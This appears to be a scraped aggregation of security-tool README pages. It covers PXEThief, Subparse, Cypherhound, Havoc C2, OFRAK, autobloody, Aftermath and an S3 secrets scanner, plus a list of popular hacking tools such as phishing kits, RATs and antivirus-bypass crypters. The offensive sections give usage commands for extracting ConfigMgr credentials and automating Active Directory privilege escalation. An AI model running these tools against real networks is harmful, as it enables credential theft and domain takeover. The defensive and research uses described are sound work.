Pull requests are generally welcome. Please, keep in mind: I am constantly working on new offsec tools as well as maintaining several existing ones. I rarely accept pull requests because I either have a plan for the course of a project or I evaluate that it would be hard to test and/or maintain the foreign code. It doesn't have to do with how good or bad is an idea, it's just too much work and also, I am kind of developing all these tools to learn myself.

There are parts of this project that were removed before publishing because I considered them to be buggy or hard to maintain (at this early stage). If you have an idea for an addition that comes with a significant chunk of code, I suggest you first contact me to discuss if there's something similar already in the making, before making a PR.



PXEThief - Set Of Tooling That Can Extract Passwords From The Operating System Deployment Functionality In Microsoft Endpoint Configuration Manager


PXEThief is a set of tooling that implements attack paths discussed at the DEF CON 30 talk Pulling Passwords out of Configuration Manager (https://forum.defcon.org/node/241925) against the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager (or ConfigMgr, still commonly known as SCCM). It allows for credential gathering from configured Network Access Accounts (https://docs.microsoft.com/en-us/mem/configmgr/core/plan-design/hierarchy/accounts#network-access-account) and any Task Sequence Accounts or credentials stored within ConfigMgr Collectio n Variables that have been configured for the "All Unknown Computers" collection. These Active Directory accounts are commonly over permissioned and allow for privilege escalation to administrative access somewhere in the domain, at least in my personal experience.

Likely, the most serious attack that can be executed with this tooling would involve PXE-initiated deployment being supported for "All unknown computers" on a distribution point without a password, or with a weak password. The overpermissioning of ConfigMgr accounts exposed to OSD mentioned earlier can then allow for a full Active Directory attack chain to be executed with only network access to the target environment.


Usage Instructions

python pxethief.py -h 
pxethief.py 1 - Automatically identify and download encrypted media file using DHCP PXE boot request. Additionally, attempt exploitation of blank media password when auto_exploit_blank_password is set to 1 in 'settings.ini'
pxethief.py 2 <IP Address of DP Server> - Coerce PXE Boot against a specific MECM Distribution Point server designated by IP address
pxethief.py 3 <variables-file-name> <Password-guess> - Attempt to decrypt a saved media variables file (obtained from PXE, bootable or prestaged media) and retrieve sensitive data from MECM DP
pxethief.py 4 <variables-file-name> <policy-file-path> <password> - Attempt to decrypt a saved media variables file and Policy XML file retrieved from a stand-alone TS media
pxethief.py 5 <variables-file-name> - Print the hash corresponding to a specified media variables file for cracking in Hashcat
pxethief.py 6 <identityguid> <identitycert-file-name> - Retrieve task sequences using the values obtained from registry keys on a DP
pxethief.py 7 <Reserved1-value> - Decrypt stored PXE password from SCCM DP registry key (reg query HKLM\software\microsoft\sms\dp /v Reserved1)
pxethief.py 8 - Write new default 'settings.ini' file in PXEThief directory
pxethief.py 10 - Print Scapy interface table to identify interface indexes for use in 'settings.ini'
pxethief.py -h - Print PXEThief help text

pxethief.py 5 <variables-file-name> should be used to generate a 'hash' of a media variables file that can be used for password guessing attacks with the Hashcat module published at https://github.com/MWR-CyberSec/configmgr-cryptderivekey-hashcat-module.

Configuration Options

A file contained in the main PXEThief folder is used to set more static configuration options. These are as follows:

[SCAPY SETTINGS]
automatic_interface_selection_mode = 1
manual_interface_selection_by_id =

[HTTP CONNECTION SETTINGS]
use_proxy = 0
use_tls = 0

[GENERAL SETTINGS]
sccm_base_url =
auto_exploit_blank_password = 1

Scapy settings

  • automatic_interface_selection_mode will attempt to determine the best interface for Scapy to use automatically, for convenience. It does this using two main techniques. If set to 1 it will attempt to use the interface that can reach the machine's default GW as output interface. If set to 2, it will look for the first interface that it finds that has an IP address that is not an autoconfigure or localhost IP address. This will fail to select the appropriate interface in some scenarios, which is why you can force the use of a specific inteface with 'manual_interface_selection_by_id'.
  • manual_interface_selection_by_id allows you to specify the integer index of the interface you want Scapy to use. The ID to use in this file should be obtained from running pxethief.py 10.

General settings

  • sccm_base_url is useful for overriding the Management Point that the tooling will speak to. This is useful if DNS does not resolve (so the value read from the media variables file cannot be used) or if you have identified multiple Management Points and want to send your traffic to a specific one. This should be provided in the form of a base URL e.g. http://mp.configmgr.com instead of mp.configmgr.com or http://mp.configmgr.com/stuff.
  • auto_exploit_blank_password changes the behaviour of pxethief 1 to automatically attempt to exploit a non-password protected PXE Distribution Point. Setting this to 1 will enable auto exploitation, while setting it to 0 will print the tftp client string you should use to download the media variables file. Note that almost all of the time you will want this set to 1, since non-password protected PXE makes use of a binary key that is sent in the DHCP response that you receive when you ask the Distribution Point to perform a PXE boot.

HTTP Connection Settings

Not implemented in this release

Setup Instructions

  1. Create a new Windows VM
  2. Install Python (From https://www.python.org/ or through the store, both should work fine)
  3. Install all the requirements through pip (pip install -r requirements.txt)
  4. Install Npcap (https://npcap.com/#download) (or Wireshark, which comes bundled with it) for Scapy
  5. Bridge the VM to the network running a ConfigMgr Distribution Point set up for PXE/OSD
  6. If using pxethief.py 1 or pxethief.py 2 to identify and generate a media variables file, make sure the interface used by the tool is set to the correct one, if it is not correct, manually set it in 'settings.ini' by identifying the right index ID to use from pxethief.py 10

Limitations

  • Proxy support for HTTP requests - Currently only configurable in code. Proxy support can be enabled on line 35 of pxethief.py and the address of the proxy can be set on line 693. I am planning to move this feature to be configurable in 'settings.ini' in the next update to the code base
  • HTTPS and mutual TLS support - Not implemented at the moment. Can use an intercepting proxy to handle this though, which works well in my experience; to do this, you will need to configure a proxy as mentioned above
  • Linux support - PXEThief currently makes use of pywin32 in order to utilise some built-in Windows cryptography functions. This is not available on Linux, since the Windows cryptography APIs are not available on Linux :P The Scapy code in pxethief.py, however, is fully functional on Linux, but you will need to patch out (at least) the include of win32crypt to get it to run under Linux

Proof of Concept note

Expect to run into issues with error handling with this tool; there are subtle nuances with everything in ConfigMgr and while I have improved the error handling substantially in preparation for the tool's release, this is in no way complete. If there are edge cases that fail, make a detailed issue or fix it and make a pull request :) I'll review these to see where reasonable improvements can be made. Read the code/watch the talk and understand what is going on if you are going to run it in a production environment. Keep in mind the licensing terms - i.e. use of the tool is at your own risk.

Related work

Identifying and retrieving credentials from SCCM/MECM Task Sequences - In this post, I explain the entire flow of how ConfigMgr policies are found, downloaded and decrypted after a valid OSD certificate is obtained. I also want to highlight the first two references in this post as they show very interesting offensive SCCM research that is ongoing at the moment.

DEF CON 30 Slides - Link to the talk slides

Author Credit

Copyright (C) 2022 Christopher Panayi, MWR CyberSec



Subparse - Modular Malware Analysis Artifact Collection And Correlation Framework


Subparse, is a modular framework developed by Josh Strochein, Aaron Baker, and Odin Bernstein. The framework is designed to parse and index malware files and present the information found during the parsing in a searchable web-viewer. The framework is modular, making use of a core parsing engine, parsing modules, and a variety of enrichers that add additional information to the malware indices. The main input values for the framework are directories of malware files, which the core parsing engine or a user-specified parsing engine parses before adding additional information from any user-specified enrichment engine all before indexing the information parsed into an elasticsearch index. The information gathered can then be searched and viewed via a web-viewer, which also allows for filtering on any value gathered from any file. There are currently 3 parsing engine, the default parsing modules (ELFParser, OLEParser and PEParser), and 4 enrichment modules (ABUSEEnricher, C APEEnricher, STRINGEnricher and YARAEnricher).

ย 

Getting Started

Software Requirements

To get started using Subparse there are a few requrired/recommened programs that need to be installed and setup before trying to work with our software.

Software Status Link
Docker Required Installation Guide
Python3.8.1 Required Installation Guide
Pyenv Recommended Installation Guide

Additional Requirements

After getting the required/recommended software installed to your system there are a few other steps that need to be taken to get Subparse installed.


Python Requirements
Python requires some other packages to be installed that Subparse is dependent on for its processes. To get the Python set up completed navigate to the location of your Subparse installation and go to the *parser* folder. The following commands that you will need to use to install the Python requirements is:
sudo get apt install build-essential
pip3 install -r ./requirements.txt

Docker Requirements
Since Subparse uses Docker for its backend and web interface, the set up of the Docker containers needs to be completed before being able to use the program. To do this navigate to the root directory of the Subparse installation location, and use the following command to set up the docker instances:
docker-compose up

Note: This might take a little time due to downloading the images and setting up the containers that will be needed by Subparse.

ย 

Installation steps


Usage

Command Line Options

Command line options that are available for subparse/parser/subparse.py:

Argument Alternative Required Description
-h --help No Shows help menu
-d SAMPLES_DIR --directory SAMPLES_DIR Yes Directory of samples to parse
-e ENRICHER_MODULES --enrichers ENRICHER_MODULES No Enricher modules to use for additional parsing
-r --reset No Reset/delete all data in the configured Elasticsearch cluster
-v --verbose No Display verbose commandline output
-s --service-mode No Enters service mode allowing for mode samples to be added to the SAMPLES_DIR while processing

Viewing Results

To view the results from Subparse's parsers, navigate to localhost:8080. If you are having trouble viewing the site, make sure that you have the container started up in Docker and that there is not another process running on port 8080 that could cause the site to not be available.

ย 

General Information Collected

Before any parser is executed general information is collected about the sample regardless of the underlying file type. This information includes:

  • MD5 hash of the sample
  • SHA256 hash of the sample
  • Sample name
  • Sample size
  • Extension of sample
  • Derived extension of sample

Parser Modules

Parsers are ONLY executed on samples that match the file type. For example, PE files will by default have the PEParser executed against them due to the file type corresponding with those the PEParser is able to examine.

Default Modules


ELFParser
This is the default parsing module that will be executed against ELF files. Information that is collected:
  • General Information
  • Program Headers
  • Section Headers
  • Notes
  • Architecture Specific Data
  • Version Information
  • Arm Unwind Information
  • Relocation Data
  • Dynamic Tags

OLEParser
This is the default parsing module that will be executed against OLE and RTF formatted files, this uses the OLETools package to obtain data. The information that is collected:
  • Meta Data
  • MRaptor
  • RTF
  • Times
  • Indicators
  • VBA / VBA Macros
  • OLE Objects

PEParser
This is the default parsing module that will be executed against PE files that match or include the file types: PE32 and MS-Dos. Information that is collected:
  • Section code and count
  • Entry point
  • Image base
  • Signature
  • Imports
  • Exports

ย 

Enricher Modules

These modules are optional modules that will ONLY get executed if specified via the -e | --enrichers flag on the command line.

Default Modules


ABUSEEnricher
This enrichers uses the [Abuse.ch](https://abuse.ch/) API and [Malware Bazaar](https://bazaar.abuse.ch) to collect more information about the sample(s) subparse is analyzing, the information is then aggregated and stored in the Elastic database.
CAPEEnricher
This enrichers is used to communicate with a CAPEv2 Sandbox instance, to collect more information about the sample(s) through dynamic analysis, the information is then aggregated and stored in the Elastic database utilizing the Kafka Messaging Service for background processing.
STRINGEnricher
This enricher is a smart string enricher, that will parse the sample for potentially interesting strings. The categories of strings that this enricher looks for include: Audio, Images, Executable Files, Code Calls, Compressed Files, Work (Office Docs.), IP Addresses, IP Address + Port, Website URLs, Command Line Arguments.
YARAEnricher
This ericher uses a pre-compiled yara file located at: parser/src/enrichers/yara_rules. This pre-compiled file includes rules from VirusTotal and YaraRulesProject

ย 

Developing Custom Parsers & Enrichers

Subparse's web view was built using Bootstrap for its CSS, this allows for any built in Bootstrap CSS to be used when developing your own custom Parser/Enricher Vue.js files. We have also provided an example for each to help get started and have also implemented a few custom widgets to ease the process of development and to promote standardization in the way information is being displayed. All Vue.js files are used for dynamically displaying information from the custom Parser/Enricher and are used as templates for the data.

Note: Naming conventions with both class and file names must be strictly adheared to, this is the first thing that should be checked if you run into issues now getting your custom Parser/Enricher to be executed. The naming convention of your Parser/Enricher must use the same name across all of the files and class names.



Logging

The logger object is a singleton implementation of the default Python logger. For indepth usage please reference the Offical Doc. For Subparse the only logging methods that we recommend using are the logging levels for output. These are:

  • debug
  • warning
  • error
  • critical
  • exception
  • log
  • info


ACKNOWLEDGEMENTS

  • This research and all the co-authors have been supported by NSA Grant H98230-20-1-0326.


Cypherhound - Terminal Application That Contains 260+ Neo4j Cyphers For BloodHound Data Sets


A Python3 terminal application that contains 260+ Neo4j cyphers for BloodHound data sets.

Why?

BloodHound is a staple tool for every red teamer. However, there are some negative side effects based on its design. I will cover the biggest pain points I've experienced and what this tool aims to address:

  1. My tools think in lists - until my tools parse exported JSON graphs, I need graph results in a line-by-line format .txt file
  2. Copy/pasting graph results - this plays into the first but do we need to explain this one?
  3. Graphs can be too large to draw - the information contained in any graph can aid our goals as the attacker and we need to be able to view all data efficiently
  4. Manually running custom cyphers is time-consuming - let's automate it :)

This tool can also help blue teams to reveal detailed information about their Active Directory environments as well.


Features

Take back control of your BloodHound data with cypherhound!

  • 264 cyphers as of date
    • Set cyphers to search based on user input (user, group, and computer-specific)
    • User-defined regex cyphers
  • User-defined exporting of all results
    • Default export will be just end object to be used as target list with tools
    • Raw export option available in grep/cut/awk-friendly format

Installation

Make sure to have python3 installed and run:

python3 -m pip install -r requirements.txt

Usage

Start the program with: python3 cypherhound.py -u <neo4j_username> -p <neo4j_password>

Commands

The full command menu is shown below:

Command Menu
set - used to set search parameters for cyphers, double/single quotes not required for any sub-commands
sub-commands
user - the user to use in user-specific cyphers (MUST include @domain.name)
group - the group to use in group-specific cyphers (MUST include @domain.name)
computer - the computer to use in computer-specific cyphers (SHOULD include .domain.name or @domain.name)
regex - the regex to use in regex-specific cyphers
example
set user svc-test@domain.local
set group domain admins@domain.local
set computer dc01.domain.local
set regex .*((?i)web).*
run - used to run cyphers
parameters
cypher number - the number of the cypher to run
example
run 7
export - used to export cypher results to txt files
parameters
cypher number - the number of the cypher to run and then export
output filename - the number of the output file, extension not needed
raw - write raw output or just end object (optional)
example
export 31 results
export 42 results2 raw
list - used to show a list of cyphers
parameters
list type - the type of cyphers to list (general, user, group, computer, regex, all)
example
list general
list user
list group
list computer
list regex
list all
q, quit, exit - used to exit the program
clear - used to clear the terminal
help, ? - used to display this help menu

Important Notes

  • The program is configured to use the default Neo4j database and URI
  • Built for BloodHound 4.2.0, certain edges will not work for previous versions
  • Windows users must run pip3 install pyreadline3
  • Shortest paths exports are all the same (raw or not) due to their unpredictable number of nodes

Future Goals

  • Add cyphers for Azure edges

Issues and Support

Please be descriptive with any issues you decide to open and if possible provide output (if applicable).



Top 20 Most Popular Hacking Tools in 2022


As last year, this year we made a ranking with the most popular tools between January and December 2022.

Topics of the tools focus onย Phishing,ย Information Gathering, Automation Tools, among others.

Without going into further details, we have prepared a useful list of the most popular tools in Kitploit 2022:


  1. Zphisher - Automated Phishing Tool


  2. CiLocks - Android LockScreen Bypass


  3. Arkhota - A Web Brute Forcer For Android


  4. GodGenesis - A Python3 Based C2 Server To Make Life Of Red Teamer A Bit Easier. The Payload Is Capable To Bypass All The Known Antiviruses And Endpoints


  5. AdvPhishing - This Is Advance Phishing Tool! OTP PHISHING


  6. Modded-Ubuntu - Run Ubuntu GUI On Your Termux With Much Features


  7. Android-PIN-Bruteforce - Unlock An Android Phone (Or Device) By Bruteforcing The Lockscreen PIN


  8. Android_Hid - Use Android As Rubber Ducky Against Another Android Device


  9. Cracken - A Fast Password Wordlist Generator, Smartlist Creation And Password Hybrid-Mask Analysis Tool


  10. HackingTool - ALL IN ONE Hacking Tool For Hackers


  11. Arbitrium-RAT - A Cross-Platform, Fully Undetectable Remote Access Trojan, To Control Android, Windows And Linux


  12. Weakpass - Rule-Based Online Generator To Create A Wordlist Based On A Set Of Words


  13. Geowifi - Search WiFi Geolocation Data By BSSID And SSID On Different Public Databases


  14. BITB - Browser In The Browser (BITB) Templates


  15. Blackbird - An OSINT Tool To Search For Accounts By Username In 101 Social Networks


  16. Espoofer - An Email Spoofing Testing Tool That Aims To Bypass SPF/DKIM/DMARC And Forge DKIM Signatures


  17. Pycrypt - Python Based Crypter That Can Bypass Any Kinds Of Antivirus Products


  18. Grafiki - Threat Hunting Tool About Sysmon And Graphs


  19. VLANPWN - VLAN Attacks Toolkit


  20. linWinPwn - A Bash Script That Automates A Number Of Active Directory Enumeration And Vulnerability Checks





Happy New Year wishes the KitPloit team!


Aftermath - A Free macOS IR Framework


Aftermath is a Swift-based, open-source incident response framework.

Aftermath can be leveraged by defenders in order to collect and subsequently analyze the data from the compromised host. Aftermath can be deployed from an MDM (ideally), but it can also run independently from the infected user's command line.

Aftermath first runs a series of modules for collection. The output of this will either be written to the location of your choice, via the -o or --output option, or by default, it is written to the /tmp directory.

Once collection is complete, the final zip/archive file can be pulled from the end user's disk. This file can then be analyzed using the --analyze argument pointed at the archive file. The results of this will be written to the /tmp directory. The administrator can then unzip that analysis directory and see a parsed view of the locally collected databases, a timeline of files with the file creation, last accessed, and last modified dates (if they're available), and a storyline which includes the file metadata, database changes, and browser information to potentially track down the infection vector.


Build

To build Aftermath locally, clone it from the repository

git clone https://github.com/jamf/aftermath.git

cd into the Aftermath directory

cd <path_to_aftermath_directory>

Build using Xcode

xcodebuild

cd into the Release folder

cd build/Release

Run aftermath

sudo ./aftermath

Usage

Aftermath needs to be root, as well as have full disk access (FDA) in order to run. FDA can be granted to the Terminal application in which it is running.

The default usage of Aftermath runs

sudo ./aftermath

To specify certain options

sudo ./aftermath [option1] [option2]

Examples

sudo ./aftermath -o /Users/user/Desktop --deep
sudo ./aftermath --analyze <path_to_collection_zip>

Releases

There is an Aftermath.pkg available under Releases. This pkg is signed and notarized. It will install the aftermath binary at /usr/local/bin/. This would be the ideal way to deploy via MDM. Since this is installed in bin, you can then run aftermath like

sudo aftermath [option1] [option2]

Uninstall

To uninstall the aftermath binary, run the AftermathUninstaller.pkg from the Releases. This will uninstall the binary and also run aftermath --cleanup to remove aftermath directories. If any aftermath directories reside elsewhere, from using the --output command, it is the responsibility of the user/admin to remove said directories.

Help Menu

Contributors
  • Stuart Ashenbrenner
  • Jaron Bradley
  • Maggie Zirnhelt
  • Matt Benyo
  • Ferdous Saljooki

Thank You

This project leverages the open source TrueTree project, written and licensed by Jaron Bradley.



Havoc - Modern and malleable post-exploitation command and control framework


Havoc is a modern and malleable post-exploitation command and control framework, created by @C5pider.

Havoc is in an early state of release. Breaking changes may be made to APIs/core structures as the framework matures.

ย 

Support

Consider supporting C5pider on Patreon/Github Sponsors. Additional features are planned for supporters in the future, such as custom agents/plugins/commands/etc.

Quick Start

Please see the Wiki for complete documentation.

Havoc works well on Debian 10/11, Ubuntu 20.04/22.04 and Kali Linux. It's recommended to use the latest versions possible to avoid issues. You'll need a modern version of Qt and Python 3.10.x to avoid build issues.

See the Installation guide in the Wiki for instructions. If you run into issues, check the Known Issues page as well as the open/closed Issues list.


Features

Client

Cross-platform UI written in C++ and Qt

  • Modern, dark theme based on Dracula

Teamserver

Written in Golang

  • Multiplayer
  • Payload generation (exe/shellcode/dll)
  • HTTP/HTTPS listeners
  • Customizable C2 profiles
  • External C2

Demon

Havoc's flagship agent written in C and ASM

  • Sleep Obfuscation via Ekko or FOLIAGE
  • x64 return address spoofing
  • Indirect Syscalls for Nt* APIs
  • SMB support
  • Token vault
  • Variety of built-in post-exploitation commands

Extensibility


Community

You can join the official Havoc Discord to chat with the community!

Contributing

To contribute to the Havoc Framework, please review the guidelines in Contributing.md and then open a pull-request!



OFRAK - Unpack, Modify, And Repack Binaries


OFRAK (Open Firmware Reverse Analysis Konsole) is a binary analysis and modification platform. OFRAK combines the ability to:

  • Identify and Unpack many binary formats
  • Analyze unpacked binaries with field-tested reverse engineering tools
  • Modify and Repack binaries with powerful patching strategies

OFRAK supports a range of embedded firmware file formats beyond userspace executables, including:

  • Compressed filesystems
  • Compressed & checksummed firmware
  • Bootloaders
  • RTOS/OS kernels

OFRAK equips users with:

  • A Graphical User Interface (GUI) for interactive exploration and visualization of binaries
  • A Python API for readable and reproducible scripts that can be applied to entire classes of binaries, rather than just one specific binary
  • Recursive identification, unpacking, and repacking of many file formats, from ELF executables, to filesystem archives, to compressed and checksummed firmware formats
  • Built-in, extensible integration with powerful analysis backends (angr, Binary Ninja, Ghidra, IDA Pro)
  • Extensibility by design via a common interface to easily write additional OFRAK components and add support for a new file format or binary patching operation

See ofrak.com for more details.


GUI Frontend

The web-based GUI view provides a navigable resource tree. For the selected resource, it also provides: metadata, hex or text navigation, and a mini map sidebar for quickly navigating by entropy, byteclass, or magnitude. The GUI also allows for actions normally available through the Python API like commenting, unpacking, analyzing, modifying and packing resources.

Getting Started

OFRAK uses Git LFS. This means that you must have Git LFS installed before you clone the repository! Install Git LFS by following the instructions here. If you accidentally cloned the repository before installing Git LFS, cd into the repository and run git lfs pull.

See docs/environment-setup for detailed instructions on how to install OFRAK.

Documentation

OFRAK has general documentation and API documentation. Both can be viewed at ofrak.com/docs.

If you wish to make changes to the documentation or serve it yourself, follow the directions in docs/README.md.

License

The code in this repository comes with an OFRAK Community License, which is intended for educational uses, personal development, or just having fun.

Users interested in OFRAK for commercial purposes can request the Pro License, which for a limited period is available for a free 6-month trial. See OFRAK Licensing for more information.

Contributing

Red Balloon Security is excited for security researchers and developers to contribute to this repository.

For details, please see our contributor guide and the Python development guide.

Support

Please contact ofrak@redballoonsecurity.com, or write to us on the OFRAK Slack with any questions or issues regarding OFRAK. We look forward to getting your feedback! Sign up for the OFRAK Mailing List to receive monthly updates about OFRAK code improvements and new features.


This material is based in part upon work supported by the DARPA under Contract No. N66001-20-C-4032. Any opinions, findings and conclusions or recommendations expressed in this material are those of the author(s) and do not necessarily reflect the views of the DARPA. Distribution Statement โ€œAโ€ (Approved for Public Release, Distribution Unlimited).



Autobloody - Tool To Automatically Exploit Active Directory Privilege Escalation Paths Shown By BloodHound


autobloody is a tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound.

Description

This tool automates the AD privesc between two AD objects, the source (the one we own) and the target (the one we want) if a privesc path exists in BloodHound database. The automation is composed of two steps:

  • Finding the optimal path for privesc using bloodhound data and neo4j queries.
  • Execute the path found using bloodyAD package

Because autobloody relies on bloodyAD, it supports authentication using cleartext passwords, pass-the-hash, pass-the-ticket or certificates and binds to LDAP services of a domain controller to perform AD privesc.


Installation

First if you run it on Linux, you must have libkrb5-dev installed on your OS in order for kerberos to work:

# Debian/Ubuntu/Kali
apt-get install libkrb5-dev

# Centos/RHEL
yum install krb5-devel

# Fedora
dnf install krb5-devel

# Arch Linux
pacman -S krb5

A python package is available:

pip install autobloody

Or you can clone the repo:

git clone --depth 1 https://github.com/CravateRouge/autobloody
pip install .

Dependencies

  • bloodyAD
  • Neo4j python driver
  • Neo4j with the GDS library
  • BloodHound
  • Python 3
  • Gssapi (linux) or Winkerberos (Windows)

How to use it

First data must be imported into BloodHound (e.g using SharpHound or BloodHound.py) and Neo4j must be running.

โš ๏ธ
-ds and -dt values are case sensitive

Simple usage:

autobloody -u john.doe -p 'Password123!' --host 192.168.10.2 -dp 'neo4jP@ss' -ds 'JOHN.DOE@BLOODY.LOCAL' -dt 'BLOODY.LOCAL'

Full help:

[bloodyAD]$ ./autobloody.py -h
usage: autobloody.py [-h] [--dburi DBURI] [-du DBUSER] -dp DBPASSWORD -ds DBSOURCE -dt DBTARGET [-d DOMAIN] [-u USERNAME] [-p PASSWORD] [-k] [-c CERTIFICATE] [-s] --host HOST

AD Privesc Automation

options:
-h, --help show this help message and exit
--dburi DBURI The host neo4j is running on (default is "bolt://localhost:7687")
-du DBUSER, --dbuser DBUSER
Neo4j username to use (default is "neo4j")
-dp DBPASSWORD, --dbpassword DBPASSWORD
Neo4j password to use
-ds DBSOURCE, --dbsource DBSOURCE
Case sensitive label of the source node (name property in bloodhound)
-dt DBTARGET, --dbtarget DBTARGET
Case sensitive label of the target node (name property in bloodhound)
-d DOMAIN, --domain DOMAIN
Domain used for NTLM authentication
-u USERNAME, --username USERNAME
Username used for NTLM authentication
-p PASSWORD, --password PASSWORD
Cleartext password or LMHASH:NTHASH for NTLM authentication
-k, --kerberos
-c CERTIFICATE, --certificate CERTIFICATE
Certificate authentication, e.g: "path/to/key:path/to/cert"
-s, --secure Try to use LDAP over TLS aka LDAPS (default is LDAP)
--host HOST Hostname or IP of the DC (ex: my.dc.local or 172.16.1.3)

How it works

First a privesc path is found using the Dijkstra's algorithm implemented into the Neo4j's GDS library. The Dijkstra's algorithm allows to solve the shortest path problem on a weighted graph. By default the edges created by BloodHound don't have weight but a type (e.g MemberOf, WriteOwner). A weight is then added to each edge accordingly to the type of edge and the type of node reached (e.g user,group,domain).

Once a path is generated, autobloody will connect to the DC and execute the path and clean what is reversible (everything except ForcePasswordChange and setOwner).

Limitations

For now, only the following BloodHound edges are currently supported for automatic exploitation:

  • MemberOf
  • ForceChangePassword
  • AddMembers
  • AddSelf
  • DCSync
  • GetChanges/GetChangesAll
  • GenericAll
  • WriteDacl
  • GenericWrite
  • WriteOwner
  • Owns
  • Contains
  • AllExtendedRights


S3Crets_Scanner - Hunting For Secrets Uploaded To Public S3 Buckets


  • S3cret Scanner tool designed to provide a complementary layer for the Amazon S3 Security Best Practices by proactively hunting secrets in public S3 buckets.
  • Can be executed as scheduled task or On-Demand

Automation workflow

The automation will perform the following actions:

  1. List the public buckets in the account (Set with ACL of Public or objects can be public)
  2. List the textual or sensitive files (i.e. .p12, .pgp and more)
  3. Download, scan (using truffleHog3) and delete the files from disk, once done evaluating, one by one.
  4. The logs will be created in logger.log file.

Prerequisites

  1. Python 3.6 or above
  2. TruffleHog3 installed in $PATH
  3. An AWS role with the following permissions:
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "VisualEditor0",
"Effect": "Allow",
"Action": [
"s3:GetLifecycleConfiguration",
"s3:GetBucketTagging",
"s3:ListBucket",
"s3:GetAccelerateConfiguration",
"s3:GetBucketPolicy",
"s3:GetBucketPublicAccessBlock",
"s3:GetBucketPolicyStatus",
"s3:GetBucketAcl",
"s3:GetBucketLocation"
],
"Resource": "arn:aws:s3:::*"
},
{
"Sid": "VisualEditor1",
"Effect": "Allow",
"Action": "s3:ListAllMyBuckets",
"Resource": "*"
}
]
}
  1. If you're using a CSV file - make sure to place the file accounts.csv in the csv directory, in the following format:
Account name,Account id
prod,123456789
ci,321654987
dev,148739578

Getting started

Use pip to install the needed requirements.

# Clone the repo
git clone <repo>

# Install requirements
pip3 install -r requirements.txt

# Install trufflehog3
pip3 install trufflehog3

Usage

Argument Values Description Required
-p, --aws_profile The aws profile name for the access keys โœ“
-r, --scanner_role The aws scanner's role name โœ“
-m, --method internal the scan type โœ“
-l, --last_modified 1-365 Number of days to scan since the file was last modified; Default - 1 โœ—

Usage Examples

python3 main.py -p secTeam -r secteam-inspect-s3-buckets -l 1

Demo


Contributing

Pull requests and forks are welcome. For major changes, please open an issue first to discuss what you would like to change.



โŒ